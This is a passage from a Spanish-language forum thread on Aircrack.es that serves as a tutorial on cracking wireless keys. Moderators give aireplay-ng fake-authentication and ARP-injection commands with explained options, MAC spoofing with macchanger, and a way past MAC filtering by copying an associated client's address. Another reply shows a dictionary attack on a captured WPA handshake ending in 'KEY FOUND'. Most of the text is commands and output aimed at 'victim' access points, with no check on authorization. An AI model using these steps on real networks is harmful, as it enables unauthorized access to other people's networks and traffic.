Foro Comunidad Aircrack.es - Seguridad Wireless  
Registrarse Ayuda Miembros Calendario Buscar Temas de Hoy Marcar Foros Como Leídos

TUTORIAL CLAVES WEP aircrack (desde cero)

Retroceder   Foro Comunidad Aircrack.es - Seguridad Wireless > Seguridad Wireless > Aircrack-ng Linux
Actualizar esta página TUTORIAL CLAVES WEP aircrack (desde cero)

Respuesta
Página 2 de 4 1 2 34
 
LinkBack Herramientas Desplegado
Antiguo 10-nov-2009, 06:01   #11 (permalink)
Moderador
 
Avatar de KezinDazel
 
Fecha de Ingreso: 05-octubre-2009
Ubicación: La Paz,Baja California Sur
Mensajes: 29
Enviar un mensaje por MSN a KezinDazel
Predeterminado
Esta bien si podrias agregar imagenes seria mejor, creo que algo visual compensa a lo ya escrito y ayuda a un mejor entendimiento

Creo que esta limitado a 4 imagenes por respuesta puedes hacer varias cuyo caso solo admita esas 4.
__________________
Saber que no se sabe lo suficiente es el camino correcto
is Offline   Responder Citando
Publicidad Gafas de Sol Gafas de Sol Ray Ban Gafas Carrera
curso aircrack
Antiguo 10-nov-2009, 12:20   #12 (permalink)
Moderador
 
Avatar de hidden
 
Fecha de Ingreso: 28-octubre-2009
Ubicación: Spain, Madrid
Mensajes: 76
Predeterminado
Cita:
Iniciado por canutet Ver Mensaje
imposible tronco
esto es otra forma de asociarte antes de inyectar

Algunos puntos de acceso están configurados para permitir únicamente una dirección MAC para asociarse y conectarse. Si este es tu caso, no serás capaz de realizar la falsa autenticación de forma éxitosa, salvo que conozcas una de las direcciones MAC que están permitidas para poder conectarse a ese AP. Si sospechas que este puede ser el problema, usa el siguiente comando mientras intentas hacer la falsa autenticación. Abre otra consola y…



escribe: tcpdump -n -vvv -s0 -e -i <nombre de interface> | grep -E (RA:<dirección MAC de tu tarjeta>|Authentication|ssoc)


Ahora deberás buscar mensajes de error.



Si deseas confirmar que estás asociado de forma correcta puedes usar tcpdump y mirar los paquetes. Inicia una consola y…



Escribe: tcpdump -n -e -s0 -vvv -i ath0


A continuación puedes ver un mensaje de error de tcpdump como el que estamos buscando:



11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station



Presta atención que el punto de acceso (00:14:6c:7e:40:80) le está diciendo a la tarjeta (00:0F:B5:88:AC:82) que no está asociada. Lo que significa que el AP no aceptará los paquetes que inyectemos.
is Offline   Responder Citando
Antiguo 10-nov-2009, 12:25   #13 (permalink)
Moderador
 
Avatar de hidden
 
Fecha de Ingreso: 28-octubre-2009
Ubicación: Spain, Madrid
Mensajes: 76
Predeterminado
Cita:
Iniciado por canutet Ver Mensaje
una cosa conoces wepbuster
webuster no pero ACONSEJO A TODOS "WIFISLAX" que tiene todos los drivers de todas las tarjetas y asi nos ahorramos ver que driver necesita nuestra tarjeta lo tienes en liveCD yo lo instale y corre de lujo ademas esta medio traducido para los que no controlan mucho ingles tiene unos foros donde aprendereis de todo, ademas utiliza los mismos comandos (codigo) para todo en serio si no sabes que tarjeta tienes o que driver necesitas para inyectar wifislax es lo mas facil.

a ver si tengo tiempo y hago un tuto paso a paso, y digo tiempo porque salgo del curro y tengo unas movidas con mi mujer que flipas que si quieres mas al ordenador que a mi, que si el ordenador o yo, no es broma chicos jajaja esta loca y un dia me lo tira por la ventana o se va de casa no soporta que me pego a la pantalla y me olvido del mundo....
Última edición por hidden; 10-nov-2009 a las 13:27
is Offline   Responder Citando
Antiguo 10-nov-2009, 13:25   #14 (permalink)
Moderador
 
Avatar de hidden
 
Fecha de Ingreso: 28-octubre-2009
Ubicación: Spain, Madrid
Mensajes: 76
Predeterminado Autenticación falsa
Descripción:

El ataque de falsa autenticación permite realizar los dos tipos de autenticación WEP (abierta u “Open System” y compartida o “Shared Key”) y asociarse con el punto de acceso (AP). Esto es muy útil cuando necesitamos una dirección MAC asociada para usarla con alguno de los ataques de aireplay-ng y no hay ningún cliente asociado. Se debe tener en cuenta que el ataque de falsa autenticación NO genera ningún paquete ARP.
Uso

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Donde:

*
-1 significa falsa autenticación
*
0 tiempo de reasociación en segundos
*
-e teddy es el nombre de la red wireless
*
-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
*
-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta
*
ath0 es el nombre de la interface wireless

U otra variación útil para algunos puntos de acceso:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Donde:

*
6000 - Reautentifica cada 6000 segundos. El largo periodo también provoca que se envien paquetes de “sigo aquí” o “keep alive”.
*
-o 1 - Enviar solo un tipo de paquetes de cada vez. Por defecto está fijado en múltiples y esto puede confundir a algunos APs.
*
-q 10 - Envia paquetes de “sigo aquí” cada 10 segundos.

Ejemplos de uso

La falta de asociación con el punto de acceso es la razón más habitual por la cual falla la inyección.

Para asociarse con un punto de acceso, usa la falsa autenticación:

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Donde:

*
-1 significa falsa autenticación
*
0 tiempo de reasociación en segundos
*
-e teddy es el nombre de la red wireless
*
-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
*
-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta
*
ath0 es el nombre de la interface wireless

Si tienes éxito verás algo como esto:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

U otra variación útil para algunos puntos de acceso:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Donde:

*
6000 - Reautentifica cada 6000 segundos. El largo periodo también provoca que se envien paquetes de “sigo aquí” o “keep alive”.
*
-o 1 - Enviar solo un tipo de paquetes de cada vez. Por defecto está fijado en múltiples y esto confunde a algunos APs.
*
-q 10 - Enviar paquetes de “sigo aquí” cada 10 segundos.

Si tienes éxito verás algo como esto:

18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
# etc...

Pistas de uso
Fijar la dirección MAC

Una buena idea es cambiar la dirección MAC de tu tarjeta wirelees por la misma que usas en el parámetro ”-h” en el caso de que sean diferentes. Usando la misma, te aseguras que los “ACK”s se envian por tu tarjeta. Esto hace que el ataque funcione mejor.

Instrucciones detalladas de como cambiar la dirección MAC de la tarjeta las puedes encontrar en el FAQ: How do I change my card's MAC address ?.

Aviso: Una dirección MAC es algo similar a: 00:09:5B:EC:EE:F2. La primera mitad (00:09:5B) de la dirección MAC se refiere al fabricante. La segunda mitad (EC:EE:F2) es única para cada aparato. Algunos puntos de acceso ignorarán direcciones MAC inválidas. Por lo tanto asegúrate de usar una dirección de un fabricante wireless válido cuando decidas cambiar la MAC. En otro caso los paquetes serán ignorados.
Inyectar en Modo Managed

Con los drivers parcheados madwifi-old CVS 2005-08-14, es posible inyectar paquetes en modo managed (la clave WEP no importa, si el AP acepta la autenticación abierta u “Open-System”). Entonces, en vez de usar el ataque 1, podemos asociarnos e inyectar / monitorizar a través de la interface athXraw:

ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid 'el ssid' key AAAAAAAAAA
ifconfig ath0 up

sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6

Ahora podemos ejecutar el ataque 3 o 4 (aireplay-ng automáticamente reemplazará ath0 por ath0raw):

aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0

aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Problemas de uso
Identificando autenticaciones fallidas

A continuación se puede ver un ejemplo de una autenticación fallida:

8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request

Presta atención a la frase “Got a deauthentication packet” y los continuos reintentos. No realices otros ataques hasta que consigas efectuar la falsa autenticación de forma correcta.

Otra forma de identificar que la falsa autenticación falla es ejecutar tcpdump y mirar los paquetes. Inicia otra consola o shell mientras estás inyectando y…

Escribe: “tcpdump -n -e -s0 -vvv -i ath0”

Aquí puedes ver un mensaje de error de tcpdump como el que estás buscando:

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station

Date cuenta de que el punto de acceso (00:14:6c:7e:40:80) le está diciendo al cliente origen (00:0f:b5:46:11:19) que no está asociado. Lo que significa, que el AP no aceptará los paquetes inyectados.

Si quieres seleccionar solo los paquetes de DeAutenticación con tcpdump, puedes usar: “tcpdump -n -e -s0 -vvv -i ath0 | grep DeAuth”. Necesitas utilizar la palabra “DeAuth” para encontrar exactamente los paquetes que buscas.

Mira las siguientes secciones para posibles soluciones.
Reasociación

Algunas veces nos desasociamos del AP de forma periódica. Algunos puntos de acceso requieren que nos reasociaciemos cada 30 segundos, o sino considera que el falso cliente se ha desconectado. En este caso, es necesario fijar el periodo de re-asociación:

aireplay-ng -1 30 -e 'el ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Otros problemas y soluciones

Si la falsa autenticación nunca tiene éxito (aireplay-ng se queda enviando intentos de autenticación) puede que esté activo el filtrado MAC. En este caso el punto de acceso solo aceptará conexiones de una/s dirección/es MAC concretas. La única solución es averiguar una dirección MAC válida utilizando la observación con airodump-ng. No hagas una autenticación falsa para una dirección MAC si ese cliente se encuentra activo en el AP.

También asegúrate de que:

*
Estás físicamente cerca del punto de acceso.
*
Asegúrate que usas una dirección MAC de un fabricante real
*
El driver de la tarjeta wireless está correctamente instalado y parcheado.
*
La tarjeta está configurada en el mismo canal que el AP.
*
El BSSID y el ESSID (opciones -a / -e) son correctos.
*
Si es una Prism2, cerciórate de que has actualizado el firmware.

esto no es mio es de:
es:fake_authentication [Aircrack-ng]
pueden aprender mucho en esta pagina
is Offline   Responder Citando
Antiguo 10-nov-2009, 13:40   #15 (permalink)
Moderador
 
Avatar de hidden
 
Fecha de Ingreso: 28-octubre-2009
Ubicación: Spain, Madrid
Mensajes: 76
Predeterminado
Cita:
Iniciado por canutet Ver Mensaje
hola, he seguito el tutorial paso a paso y to bien hasta el momento de inyectar paquetes , no hay manera de hacerlo seguro que estoy haciendo algo mal, estoy utilizando este adaptador usb CompraWifi-GOLD USB REDUCIDO 500mW + Antena RP-SMA 5dbi + Modo monitor (Chipset Realtek 8187L) y cuando llego a la parte de:
Para inyectarle trafico a la red abre otra terminal (consola) donde introduciras los siguientes comandos:
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
-e es el nombre de la red que estamos atacando

salen las cuatro lineas un puñao de rato y luego me sale el error de que no se puede conectar, a ver si me puedes ayudar gracias de antemano.


a una cosa muy bueno el tutorial
¿Cual es el significado de los datos mostrados por airodump-ng?

airodump-ng nos mostrará una lista de los puntos de acceso detectados, y también una lista de los clientes conectados (“stations”). Como ejemplo puedes ver la siguiente captura de pantalla:

CH 9 ][ Elapsed: 4 s ][ 2007-02-25 16:47

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR
00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear

BSSID STATION PWR Lost Packets Probes

00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14
(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:5211 -1 0

canu tronco fijate en STATION ahi es donde veras los clientes asociados y esa es la mac que deves utilizar para poder asociarte correctamente si el acces point, punto de acceso (ap) tiene filtrado de mac

espero que te ayude.
Última edición por hidden; 11-nov-2009 a las 06:22
is Offline   Responder Citando
Antiguo 11-nov-2009, 17:57   #16 (permalink)
Moderador
 
Avatar de hidden
 
Fecha de Ingreso: 28-octubre-2009
Ubicación: Spain, Madrid
Mensajes: 76
Wink Esta es muy facil amigo chocolate!!!
Cita:
Iniciado por Chocolate Ver Mensaje
A mi no me deja instalar el paquete macchanger
xxxx@ubuntu:~$ sudo apt-get install macchanger
[sudo] password for xxxx:
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias
Leyendo la información de estado... Hecho
E: No se pudo encontrar el paquete macchanger


Que deberia hacer? El aircrack lo tengo instalado. Gracias.
Tengo instalada la ultima version de ubuntu
pues como dices he visto que es cierto, peeero...
lo que te pasa compadre es que necesitas hacer dos cositas actualizar tu sistema y instalar las actualizaciones.... como pues aqui te lo dejo:
sudo apt-get update esto tarda un poco y:
sudo apt-get upgrade esto tarda mas jajaja

despues:

sudo apt-get install macchanger

EJEMPLO:
root@ubuntu:/home/alber# apt-get install macchanger
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes NUEVOS:
macchanger
0 actualizados, 1 se instalarán, 0 para eliminar y 0 no actualizados.
Necesito descargar 88,0kB de archivos.
Se utilizarán 332kB de espacio de disco adicional después de esta operación.
Des:1 Index of / karmic/universe macchanger 1.5.0-3 [88,0kB]
Descargados 88,0kB en 0s (169kB/s)
Seleccionando el paquete macchanger previamente no seleccionado.
(Leyendo la base de datos ... 00%
117114 ficheros y directorios instalados actualmente.)
Desempaquetando macchanger (de .../macchanger_1.5.0-3_i386.deb) ...
Procesando disparadores para install-info ...
Procesando disparadores para man-db ...
Configurando macchanger (1.5.0-3) ...
Ignoring install-info called from maintainer script
The package macchanger should be rebuild with new debhelper to get trigger support

suerte!!!
is Offline   Responder Citando
Antiguo 18-nov-2009, 09:13   #17 (permalink)
Novato
 
Fecha de Ingreso: 18-noviembre-2009
Mensajes: 1
Question zurditooo
hola q tal mira pude capturar paquetes wep y wpa no tube problema obtube en hexadecimal y ascii sus claves , mi pregunta es esta ... cuando estoy capturando con airodump-ng puedo guardar el fichero y seguir escaneando en otro momento asi no tengo q volver a repetir el proceso ? y no pierdo la DATa por q en algunas redes tarda mucho capturar no es en 15min o 4hs sino ... 1 dia imedio :S . espero q se pueda gracias !
is Offline   Responder Citando
Antiguo 23-nov-2009, 21:00   #18 (permalink)
Moderador
 
Avatar de hidden
 
Fecha de Ingreso: 28-octubre-2009
Ubicación: Spain, Madrid
Mensajes: 76
Predeterminado si puedes!!
Cita:
Iniciado por zurdito Ver Mensaje
hola q tal mira pude capturar paquetes wep y wpa no tube problema obtube en hexadecimal y ascii sus claves , mi pregunta es esta ... cuando estoy capturando con airodump-ng puedo guardar el fichero y seguir escaneando en otro momento asi no tengo q volver a repetir el proceso ? y no pierdo la DATa por q en algunas redes tarda mucho capturar no es en 15min o 4hs sino ... 1 dia imedio :S . espero q se pueda gracias !
si lo tienes por defecto los archivos .cap se guardaran en ~home\usuario podras usarlos de nuevo cuando lo necesites.

prueva y nos cuentas

PD: si pones el signo "*" en .cap juntara todos los que tengas.

aircrack-ng *-01.cap
is Offline   Responder Citando
Antiguo 20-dic-2009, 09:51   #19 (permalink)
Novato
 
Fecha de Ingreso: 20-diciembre-2009
Mensajes: 2
Predeterminado
Cita:
Iniciado por hidden Ver Mensaje
wenas peña aqui les dejo un tuto que espero les ayude mucho y para aquellos que tienen linux ya sea ubuntu o cualquier versión pueden conseguir aircrack desde una shell facilmente ...........
Hola amigos... soy nuevo por aqui. (aunque no mucho en Linux y Ubuntu)

antes que nada, cuando hago que mi tarjeta inalambrica de mi laptop se ponga en modo monitor con el comandos:

Código:
airmon-ng start wlan0
se activa em modo monitor tal cual le ordeno pero no exactamente la interfaz wlan0 sino que se crea una llamada mon0 el cual dice estar en modo monitor junto con wlan0 que tambien se pasa a modo monitor.

hay otro caso que hago que me crea y pone en modo monitor la interfaz mon0 y me mantiene la interfaz wlan0 en modo managed.

aqui estan las salidas del comando iwconfig:

Código:
iwconfig
wlan0     IEEE 802.11abgn  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
mon0      IEEE 802.11abgn  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
y la del comando ifconfig para que verifiquen:

Código:
ifconfig
mon0      Link encap:UNSPEC  direcciónHW 00-24-2C-07-07-D6-30-30-00-00-00-00-00-00-00-00  
          ACTIVO DIFUSIÓN NOTRAILERS FUNCIONANDO PROMISC ALLMULTI  MTU:1500  Métrica:1
          Paquetes RX:12677 errores:0 perdidos:0 overruns:0 frame:0
          Paquetes TX:0 errores:0 perdidos:0 overruns:0 carrier:0
          colisiones:0 long.colaTX:1000 
          Bytes RX:1893117 (1.8 MB)  TX bytes:0 (0.0 B)

wlan0     Link encap:UNSPEC  direcciónHW 00-24-2C-07-07-D6-00-00-00-00-00-00-00-00-00-00  
          ACTIVO DIFUSIÓN NOTRAILERS PROMISC ALLMULTI  MTU:1500  Métrica:1
          Paquetes RX:14668 errores:0 perdidos:0 overruns:0 frame:0
          Paquetes TX:1198 errores:0 perdidos:0 overruns:0 carrier:0
          colisiones:0 long.colaTX:1000 
          Bytes RX:3268631 (3.2 MB)  TX bytes:213255 (213.2 KB)
no se si esta correcto ya que en el tutorial no dice nada de otras interfaces o salidas de estos dos comandos

ahora bien estube intentando esto hackeando mi propio router/ap Nexxt 802.11B/G (es el negro) y bueno la mayiria de los pasos me funcionaron al pelo, exepto la parte de la inyeccion.

al intentar el comando:
Código:
angel666@angel-laptop:~$ sudo aireplay-ng -1 0 -a MAC-Router -h MAC-Laptop -e Router-Nexxt wlan0
me sale lo siguiente:
Código:
02:18:55  Waiting for beacon frame (BSSID: MAC-Router) on channel 6

02:18:55  Sending Authentication Request (Open System)

02:18:57  Sending Authentication Request (Open System)

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.
esto me indica que no pudo realizarse la conexion falsa, todos los parametros estan bien, es decir el mac de mi router es el correcto, el router esta usando el canal 6, etc. lo unico que no esta tal cual sale en tutorial es la mac de mi laptop, en realidad no quise cambiarsela y ademas como estoy atacando mi propio router no creo q la necesite porq de logica no me voy a bannear yo mismo

el otro detalle es que el metodo de encriptacion que actualmente usa mi router es WPA2 (de mas de 30 caracteres con letras Aa numeros y simbolos) y no WEP como explica el tutorial, se que al menos que cambie la encriptacion a WEP no voy a obtener la contraseña, pero esto no me importa porq lo que quiero es saber si el chip de mi inalambrica es capas de inyectar.

muy bien, luego de escudriñar porque no me funciona intente con esto:
Código:
angel666@angel-laptop:~$ sudo aireplay-ng -1 0 -a MAC-Router -h MAC-laptop -e router-Nextt mon0
03:14:15  Waiting for beacon frame (BSSID: 08:10:74:62:2D:CA) on channel 6

03:14:15  Sending Authentication Request (Open System) [ACK]
03:14:15  Authentication successful
03:14:15  Sending Association Request [ACK]
03:14:15  Association denied (code 13)

03:14:18  Sending Authentication Request (Open System) [ACK]
03:14:18  Authentication successful
03:14:18  Sending Association Request [ACK]
03:14:18  Association denied (code 13)
fijese que cambie la interfaz inalambrica de wlan0 a mon0 y me dice que se realizo la conexion.

ahora luego de ver esto y pensar que se conectaba ejecute el comando
Código:
sudo aireplay-ng -3 -b 08:10:74:62:2D:CA -h 00:24:2C:07:07:D6 wlan0
el cual me devuelve

Código:
angel666@angel-laptop:~$ sudo aireplay-ng -3 -b MAC-Router -h MAC-Laptop wlan0
03:15:46  Waiting for beacon frame (BSSID: MAC-router) on channel 6
Saving ARP requests in replay_arp-1220-031546.cap
You should also start airodump-ng to capture replies.
72 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

luego de todo esto, quisiera saber si en este ultimo comando de verdad esta inyectando ya que yo no estoy seguro, pues el comando anterior para realizar la conexion falsa no es del todo claro ademas que no esta hecho con la interfaz wlan0.

para estas pruebas use una lapto HP Pavilion DV7 con Ubuntu 9.10
esta laptop trae el chip inalambrico Atheros AR5009 el cual en Linux y la web de madwifi los conocen como AR928X, tengo instalado los drivers madwifi-hal-0.10.5.6-r4100-20090929 (ath9k) y bueno esta demas que tengo instalado aircrack-ng, aircrack-ptw, wavemon, aircrackGui, Wifi radar, Wireshark, y Kismet.

ahh una cosa, no se porque kismet no me corre, me sale este mensaje cuando lo ejecuto con sudo kismet:

Código:
Launching kismet_server: //usr/bin/kismet_server
Suid priv-dropping disabled.  This may not be secure.
No specific sources given to be enabled, all will be enabled.
Non-RFMon VAPs will be destroyed on multi-vap interfaces (ie, madwifi-ng)
Enabling channel hopping.
Enabling channel splitting.
NOTICE: Disabling channel hopping, no enabled sources are able to change channel.
Source 0 (addme): Opening none source interface none...
FATAL: Please configure at least one packet source.  Kismet will not function if no packet sources are defined in kismet.conf or on the command line.  Please read the README for more information about configuring Kismet.
Kismet exiting.
Done.

una cosa mas, se que tal vez una de las razones por la que mi tarjeta tal vez no inyecte es porq simplemente es posible que no permita esta funcion, pero en el mismo tutorial dice que es recomendable tener parchado los drivers, me recorde de que creo q esto no lo e hecho, (a pesar de que la tarjeta se coloca en monitor). podrian explicarme como parchar mi tarjeta atheros AR928x como dicen ??? o recomendarme algun tutorial ???

conocen ustedes algun comando del aireplay que me pueda decir o verificar si mi tarjeta es capaz de inyectar... me importa mas en estos momentos saber si mi chip inalambrico es capaz de inyectar...

otra cosa.... en caso de que uno no pueda generar trafico en el ap victima por x motivo (en mi caso posiblemente no ser capaz de inyectar o drivers no parchados) como se hace para llegar a la cantidad de paquetes requeridos ??? habra que esperar el monton de horas o dias que se demore el escaneo hasta llegar a dicha ccantidad de paquetes????


conocen algun tutorial para crackear una red o AP con encriptacionWPA2 ???

Saludos
is Offline   Responder Citando
Antiguo 25-dic-2009, 17:56   #20 (permalink)
Moderador
 
Avatar de hidden
 
Fecha de Ingreso: 28-octubre-2009
Ubicación: Spain, Madrid
Mensajes: 76
Predeterminado si pero en english
Lo primero que necesitas saber es que si atacas un ap con wpa no necesitas una asociación necesitas un handsake con el ap (handsake=apreton de manos, mas o menos )

crack WPA\WPA2:

Now onto cracking WPA/WPA2 passphrases. Aircrack-ng can crack either types.

aircrack-ng -w password.lst *.cap
Where:

-w password.lst---- is the name of the password file. Remember to specify the full path if the file is not located in the same directory.

*.cap----is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

The program responds:

Opening wpa2.eapol.cap
Opening wpa.cap
Read 18 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 Harkonen WPA (1 handshake)
2 00:0D:93:EB:B0:8C test WPA (1 handshake)

Index number of target network ?

Notice in this case that since there are multiple networks we need to select which one to attack. We select number 2. The program then responds:

Aircrack-ng 0.7 r130


[00:00:03] 230 keys tested (73.41 k/s)


KEY FOUND! [ biscotte ]


Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE

Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD

EAPOL HMAC : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD

Now you have the passphrase and can connect to the network.

Aircrack tiene su propia web pasate http://www.aircrack-ng.org/doku.php?id=aircrack-ng

SUERTE Y FELIZ NAVIDAD!!
Última edición por hidden; 25-dic-2009 a las 18:07
is Offline   Responder Citando
Respuesta
Página 2 de 4 1 2 34

« Instalacion offline | Aircrack en Linux Mint »
Herramientas
Desplegado
Mode Lineal Mode Lineal

Normas de Publicación
No puedes crear nuevos temas
No puedes responder mensajes
No puedes subir archivos adjuntos
No puedes editar tus mensajes
Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks are Activado
Pingbacks are Activado
Refbacks are Activado



© 2009 Comunidad Aircrack - Seguridad Wireless

Contáctenos - Aircrack - Archivo - Arriba